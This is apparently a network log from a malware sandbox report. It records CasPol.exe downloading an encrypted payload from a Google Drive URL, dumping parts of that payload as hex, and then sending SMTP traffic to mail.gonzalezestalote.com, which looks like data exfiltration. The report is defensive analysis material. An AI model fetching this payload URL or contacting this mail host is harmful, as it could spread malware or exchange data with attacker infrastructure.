Jul 8, 2022 06:01:38.407658100 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407798052 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407819033 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407833099 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407855034 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407874107 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408056021 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408144951 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408243895 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408353090 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.408385992 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408399105 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.408529997 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408554077 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408705950 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.408739090 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.408896923 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.408925056 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409046888 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409161091 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409179926 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.409208059 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409389019 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409550905 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.409589052 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409616947 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.409931898 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.409975052 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.410012007 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.410017014 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.410240889 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:51.365571022 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.396712065 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.396962881 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.433058023 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.433449030 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.464891911 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.465188980 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.500355959 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.503304005 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.544784069 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.544874907 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.544955015 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.545027018 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.554162025 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:51.585784912 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:51.639271975 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.648809910 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.680447102 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.686336040 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.718123913 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.718575954 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.754909992 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.755564928 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.786781073 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.787180901 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.828552961 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.828903913 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.860136032 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.904472113 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.931858063 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.931915045 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.931927919 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.931993961 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:01:53.963469028 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.963517904 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.963550091 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.963581085 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:53.983851910 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:01:54.029458046 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:03:31.226948977 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:03:31.260029078 CEST	587	49749	185.101.224.45	192.168.11.20
Jul 8, 2022 06:03:31.260211945 CEST	49749	587	192.168.11.20	185.101.224.45
Jul 8, 2022 06:03:31.260593891 CEST	49749	587	192.168.11.20	185.101.224.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2022 06:01:37.175949097 CEST	63198	53	192.168.11.20	1.1.1.1
Jul 8, 2022 06:01:37.184885025 CEST	53	63198	1.1.1.1	192.168.11.20
Jul 8, 2022 06:01:38.035819054 CEST	54695	53	192.168.11.20	1.1.1.1
Jul 8, 2022 06:01:38.068016052 CEST	53	54695	1.1.1.1	192.168.11.20
Jul 8, 2022 06:01:51.200717926 CEST	65345	53	192.168.11.20	1.1.1.1
Jul 8, 2022 06:01:51.301168919 CEST	53	65345	1.1.1.1	192.168.11.20
Jul 8, 2022 06:01:51.697470903 CEST	61274	53	192.168.11.20	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 8, 2022 06:01:37.175949097 CEST	192.168.11.20	1.1.1.1	0xd655	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Jul 8, 2022 06:01:38.035819054 CEST	192.168.11.20	1.1.1.1	0xdd96	Standard query (0)	doc-0k-0s-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Jul 8, 2022 06:01:51.200717926 CEST	192.168.11.20	1.1.1.1	0xddfc	Standard query (0)	mail.gonzalezestalote.com	A (IP address)	IN (0x0001)
Jul 8, 2022 06:01:51.697470903 CEST	192.168.11.20	1.1.1.1	0x760b	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 8, 2022 06:01:37.184885025 CEST	1.1.1.1	192.168.11.20	0xd655	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)
Jul 8, 2022 06:01:38.068016052 CEST	1.1.1.1	192.168.11.20	0xdd96	No error (0)	doc-0k-0s-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Jul 8, 2022 06:01:38.068016052 CEST	1.1.1.1	192.168.11.20	0xdd96	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.225	A (IP address)	IN (0x0001)
Jul 8, 2022 06:01:51.301168919 CEST	1.1.1.1	192.168.11.20	0xddfc	No error (0)	mail.gonzalezestalote.com	gonzalezestalote.com		CNAME (Canonical name)	IN (0x0001)
Jul 8, 2022 06:01:51.301168919 CEST	1.1.1.1	192.168.11.20	0xddfc	No error (0)	gonzalezestalote.com		185.101.224.45	A (IP address)	IN (0x0001)
Jul 8, 2022 06:01:51.706505060 CEST	1.1.1.1	192.168.11.20	0x760b	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0k-0s-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49737	142.250.186.78	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-08 04:01:37 UTC	0	OUT	GET /uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-07-08 04:01:37 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 08 Jul 2022 04:01:37 GMT Location: https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466//1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version= Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-6mgi7FsHXghSv2zqdiYiHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49738	142.250.185.225	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-08 04:01:38 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0k-0s-docs.googleusercontent.com Connection: Keep-Alive
2022-07-08 04:01:38 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdv4sm9JxdWzfA0ZDVpjH-60MVQh6IKZ2uQ3mEhj4xVgR9HSjFGYIrQQ6RvC1P6CRbvqd988n0BD7xHH-q7kCtvZbg Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="slims4417_qsyFfBymE214.bin";filename*=UTF-8''slims4417_qsyFfBymE214.bin Content-Length: 214592 Date: Fri, 08 Jul 2022 04:01:38 GMT Expires: Fri, 08 Jul 2022 04:01:38 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=uwAj6w== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-07-08 04:01:38 UTC	6	IN	Data Raw: de 36 ae 17 e9 5d 35 db 38 a2 3a b9 81 57 51 70 f0 9c 78 45 f2 86 45 27 87 b0 c9 af ce cb 1e d1 16 47 6e 6f a8 98 3d fc 13 aa 50 31 af 08 b7 d7 2e f6 68 0b 47 60 75 cb 89 64 cb 69 8e f8 2e 3c f2 a0 0b 4f a3 8c 51 b6 1b 22 fd f5 44 dc 20 73 f1 92 44 5a 16 83 cf 54 89 2e 81 c2 0d 53 89 df df 44 3b e1 d9 b6 f5 08 08 bb 1b b7 8a a8 1b 23 b2 6e 21 38 a6 0b 12 50 3b 47 43 1b 4d 3b ce 42 a9 8c 35 bf 13 32 bb 81 59 c7 78 3d 64 be 4a cf bd 46 59 70 74 38 b8 54 52 6a 0c 17 b7 7a 24 42 02 f0 d3 c3 8f 3a de 33 93 17 96 da e0 f8 57 d4 2b 22 87 5c 26 f3 7f 09 c6 de ec b2 45 0d 55 fa 1a 5d fc fa db 1d ce 98 40 89 4c 6f af fa 86 98 7a 31 c8 08 52 4c a4 a8 9b 06 2a df 2e f3 85 12 2d 57 dc fc e9 0d 27 18 39 73 8e 80 96 b9 18 76 00 15 0b 08 bf be db ed 15 45 52 ab 73 85 0b Data Ascii: 6]58:WQpxEE'Gno=P1.hG`udi.<OQ"D sDZT.SD;#n!8P;GCM;B52Yx=dJFYpt8TRjz$B:3W+"\&EU]@Loz1RL*.-W'9svERs
2022-07-08 04:01:38 UTC	9	IN	Data Raw: 36 19 8c 34 25 3e 05 fd 02 5f df 18 da a0 8d 05 17 2f 5b 9a 33 9c 7a 63 58 0d 3c 69 f8 40 a1 b2 e5 c7 d3 12 a8 99 36 f8 87 4e 87 82 44 16 eb ef ad c7 a1 c0 fc 55 95 cc a3 64 94 c6 2a 1f 76 3b 4f ff 6e de b8 92 d2 4f 19 b8 87 56 ac 69 e6 cc 88 dd bf 47 ba ac 28 86 87 1a b8 a9 f5 23 0b a0 73 2f d5 9b b5 c9 ea f4 4f e4 b6 87 62 ab 92 d0 fd bb dc 49 27 49 82 64 d7 76 25 e3 fc 4f 29 d8 6f a1 78 ad 14 c7 21 93 4d 9e 98 4d bd e1 e2 dd a6 f5 0d 5a 89 f0 2c b6 8d ba 0e aa a4 4a fd a2 75 b8 a3 4a c4 ec e7 d4 bb e1 b1 3f b4 d0 5a 4e a0 4e b9 de 04 d0 f4 72 68 ab ba 38 2e f5 69 9d d5 df 75 1c 20 dc 51 c5 22 3e b1 58 b4 79 93 37 18 0b 28 87 da df 02 24 66 6f 75 15 24 88 2f 74 7b d1 01 ff c8 ca 49 36 1e ad 88 22 4b b5 a1 9c 5a da 60 6e 21 7c 84 71 62 e3 ff 4a 31 26 17 Data Ascii: 64%>_/[3zcX<i@6NDUd*v;OnOViG(#s/ObI'Idv%O)ox!MMZ,JuJ?ZNNrh8.iu Q">Xy7($fou$/t{I6"KZ`n!\|qbJ1&
2022-07-08 04:01:38 UTC	13	IN	Data Raw: c4 6c 53 ec 85 12 81 93 22 5f 6d 9f bb 87 8b b5 8e d9 77 d2 71 7f 83 5f 63 26 b0 7d 95 e8 75 39 f3 1d 1f 77 59 94 3e 5d 40 f4 9f b9 e9 5f 19 6b be 84 43 03 22 c8 67 ab 8e 8e e5 70 d0 c4 fd 96 91 68 57 96 d4 ee 82 78 b3 4e fe 9f 2c aa 90 f9 6d d3 78 13 2e 48 43 31 5c 2e c5 76 0b b3 2c 99 b5 72 5f 8a f6 d7 69 a4 d0 9e 87 59 69 3a b0 0b 73 c9 01 8e cc 2b 3d 8c e2 2c 8b 2f 6b 72 52 81 9a 81 b1 fd 4a b5 5c c7 42 19 fc 16 ad 93 35 f3 11 fe 1c 65 cf 55 9c a3 a5 7c a1 51 75 62 b5 bf c0 2e d3 03 4d f1 ad fd 8a 64 bc 52 71 37 94 e8 e1 4e a8 17 8e 61 e4 71 30 36 c4 51 bc 2d 7f 91 6d 58 3f fb 2e 31 0a 35 25 34 c3 ee 03 21 ca 18 da a4 b8 49 17 2e 42 08 3f 85 7e 17 5a 0d 27 cb f0 4b c9 bc e1 ff c4 b2 a0 82 34 4b 8b 4d e8 61 45 3a e2 44 ba e1 92 dd fc 5f b9 3d bc 76 8d Data Ascii: lS"_mwq_c&}u9wY>]@_kC"gphWxN,mx.HC1\.v,r_iYi:s+=,/krRJ\B5eU\|Qub.MdRq7Naq06Q-mX?.15%4!I.B?~Z'K4KMaE:D_=v
2022-07-08 04:01:38 UTC	17	IN	Data Raw: bc 9b eb 3d 46 52 ab 79 af 30 47 0a 2b e7 94 f5 81 99 e3 68 40 91 9c 11 41 bf 6e be ea 3d 90 b4 1f 51 09 7a 46 3d bb 6f 79 ba e3 2e d9 6d a9 55 18 b8 77 13 86 1c 42 87 a3 91 2e 5a 8b 25 9a 13 cb 8b 80 82 b0 fc 61 53 8d 24 07 2f 9f 7a db f6 d6 e3 4f 06 5c 08 aa 50 3a 5e 9b cb 87 16 e5 df 1e b3 a5 ff 35 7c 0e bc ff 84 2a cf 1a 3e 08 b2 ec 2b ff b5 9b 25 d6 e3 1c 58 39 78 e3 70 7a 1e 40 1b 8b 55 6b bd fd 37 10 c8 40 c3 7f b9 9a e1 53 2f a5 68 27 af cf 58 65 53 7e c6 43 55 8d 5b 45 4f 35 22 60 ab 5c 1a 0d 2b 43 ee f7 c8 2a bb eb f0 e9 4e 82 d9 91 72 fb 4c cf cf a9 45 1e 9d e6 d2 ae 73 d5 6d 63 ec 85 f3 9c fc 56 55 40 5d 74 a5 f5 d7 fb e0 7d c6 63 5a 9e 46 0b 26 89 7d 9f fa 13 75 fa 72 63 ab 87 92 3c 56 7d fc fd ca 86 02 13 78 b9 49 48 44 8f ca 67 a7 9f fb 11 Data Ascii: =FRy0G+h@An=QzF=oy.mUwB.Z%aS$/zO\P:^5\|>+%X9xpz@Uk7@S/h'XeS~CU[EO5"`\+CNrLEsmcVU@]t}cZF&}urc<V}xIHDg
2022-07-08 04:01:38 UTC	18	IN	Data Raw: 6a 34 5a 85 5f 27 93 55 1f c3 4a b4 e6 83 9d fc 5f b7 43 b2 62 97 81 ed 1f 76 3b fe 15 44 9f ae 81 c2 77 13 b9 87 46 bd 79 89 05 8a dd b5 4c c3 ac 28 e7 94 10 a9 be 9a c8 0a b3 49 15 25 58 b5 c9 fb ed 20 08 a7 91 63 bb ff d2 fd bd b3 a3 3d b7 89 27 3d 5d 67 f2 e4 43 3f cb 72 77 a5 83 1d c7 56 4a 4a 9e 92 53 a4 fb f3 cb a8 23 53 74 83 88 9d a7 9c a9 30 63 ff 53 f0 00 63 b0 49 5f fc c3 57 f5 bb eb 9f 34 bf d0 57 4a 52 5e 99 c8 34 06 f6 75 73 42 36 13 27 8b 65 8e c4 ca 48 63 16 09 53 c2 38 62 a1 65 a7 45 a5 1f 80 0d 35 86 ce f0 c3 d8 67 45 77 8c dd 8e 0c 75 68 c5 63 b8 de e2 9d 47 48 ab 2a 39 53 be bc 83 72 45 7b 90 2a 78 8b 0f 71 e9 ec 42 30 cb 1d 5a a6 8d d7 be bd fa 9d 57 2d 8b 51 b6 1e 31 ef e4 a9 35 08 ad 4b 92 42 f8 07 91 d8 7c 33 2f 81 c4 af 42 9b cb Data Ascii: j4Z_'UJ_Cbv;DwFyL(I%X c='=]gC?rwVJJS#St0cScI_W4WJR^4usB6'eHcS8beE5gEwuhcGH9SrE{xqB0ZW-Q15KB\|3/B
2022-07-08 04:01:38 UTC	19	IN	Data Raw: 88 8d ea 7e ac fc 2e 16 2b 5b e2 88 cd d6 e3 41 25 9e 86 fb 56 12 7c 90 cc 9b b2 8f df 1e b8 8a 1b cc 7c 0e b4 be 36 d4 30 e1 07 d6 a4 c4 ce d5 96 9d 3c 51 f3 34 d4 38 6b ea 72 71 19 53 f9 37 55 6b ba 4c 23 0e da 22 3f 2e b9 9b 8f 3e 3e aa 7a 22 24 b5 77 74 55 b3 71 4c 41 93 3b 4f 67 a9 20 73 a7 6b 0f 16 39 69 71 df c8 2c a9 4e c5 eb 4e 85 dc 83 1d 89 d4 cf cb 8b 17 12 9d ec a6 37 ad c4 7a 4f d1 8e 8d 3c 88 6f 5f 6d 94 c5 dc e4 d0 84 05 7f d7 65 19 af 57 0c 55 a3 75 9d f2 13 15 fa 72 6f 64 5d b6 c8 50 51 fd fd c6 f8 5b 3b 5e b3 95 44 46 5a c8 67 e0 81 80 3b 40 f5 ec d0 2f 91 62 44 8f c7 e7 ae b0 a0 47 91 f5 2c aa 9a ed 7e da 50 2e 1e 4b 49 af 49 3a d6 76 d7 6d 32 aa 96 74 44 8a fb d3 86 8d d2 9c 9f 58 b7 3d 8c f5 72 e5 42 fd c7 2b 38 94 1c 2d 37 2d 40 70 Data Ascii: ~.+[A%V\|\|60<Q48krqS7UkL#"?.>>z"$wtUqLA;Og sk9iq,NN7zO<o_meWUurod]PQ[;^DFZg;@/bDG,~P.KII:vm2tDX=rB+8-7-@p
2022-07-08 04:01:38 UTC	20	IN	Data Raw: 0d 08 8a 8e 3f b2 f3 a0 18 99 fa 3c 06 a2 72 ab 4b b5 e9 b4 f6 b9 44 1e 48 3f b3 d0 55 46 57 b1 94 f0 17 dc ed 0b 58 55 bb 10 85 94 6e 91 d5 d3 46 7b c0 d6 7d cc 39 e8 fd 74 b3 5b 31 05 18 0d 31 93 d5 d4 1c d2 7a bd 61 2d d0 89 1b 5c 39 d7 72 ac 6a d4 4f 45 40 b5 76 29 6d bf d6 a7 5a dd 7f ee 0d 50 9a 0b 67 cb cf 4e 26 d2 00 65 c9 80 f3 62 b7 e6 65 4e 8c 86 56 a0 37 de fc f5 bd 81 3d 7f 49 9a 5b 57 e8 82 e3 5f ce 33 ff df 0d 53 8d 7d c0 4a 37 e1 d1 a9 ff f6 09 97 10 b0 90 80 e5 22 b2 68 83 27 ad 07 12 58 25 b9 42 37 c6 3c d6 6a 5a 92 8f b7 b1 99 bb 40 78 77 6f 8f a8 b3 1c b0 d8 35 71 1f 17 a9 de 0a 31 2c 29 4c af ea b5 d2 5c d0 a2 96 ac 48 d1 5d b3 7e c9 fa a4 a6 12 f9 7e 2a e3 39 08 fe 7b 14 1c df c0 b0 5d 00 55 f3 53 e6 fd d6 93 37 96 82 2d 41 d9 15 51 Data Ascii: ?<rKDH?UFWXUnF{}9t[11za-\9rjOE@v)mZPgN&ebeNV7=I[W_3S}J7"h'X%B7<jZ@xwo5q1,)L\H]~~*9{]US7-AQ
2022-07-08 04:01:38 UTC	21	IN	Data Raw: c3 c2 e9 51 a9 fb 8e 77 a8 4c cf cf a9 72 1c 9d ea 95 19 73 d5 61 c5 f4 82 9c 32 21 3c 5b 6d 95 a8 a1 74 d0 8e d9 4e df 1c 7f 92 57 08 7b a2 7f 9f fd 54 0b fa 72 63 f7 50 9e 2d 56 8c b2 e8 ce e9 5d 0c 5a 80 8c 30 65 5a c8 63 89 8e 82 3b 44 dd cf d0 96 9b e2 4d 86 c5 e3 73 59 a6 47 91 e6 33 8b a9 f4 00 d3 50 3d 2a 60 5d ed 49 3c fe 5d d7 6d 29 3c 94 5f 5f 8e 21 c9 7c 8c fe 9c 98 5e 84 17 e4 02 73 c9 44 c2 d9 29 3f 8a ca 0f 1b 2f 61 f2 3f 81 9a 85 3b f4 4a b5 4e b9 5f 19 fc 12 85 b0 35 f3 1b 7e 91 64 cf 51 67 78 a6 7c 0b 52 6a 12 9b a6 be 27 ce 03 49 d8 b9 ff 8a 62 10 70 71 37 dd 68 e8 4e 6f 12 53 dc e3 71 30 34 db 20 8f 34 01 98 6d 58 3b d3 39 33 c7 32 0d 17 0e ef 09 a1 cc 18 da a0 78 d6 14 2f 51 3a 24 f7 61 0c 24 04 3a cb f4 72 c7 ad e5 c1 ff 93 a0 82 3e Data Ascii: QwLrsa2!<[mtNW{TrcP-V]Z0eZc;DMsYG3P=*`]I<]m)<__!\|^sD)?/a?;JN_5~dQgx\|Rj'Ibpq7hNoSq04 4mX;932x/Q:$a$:r>
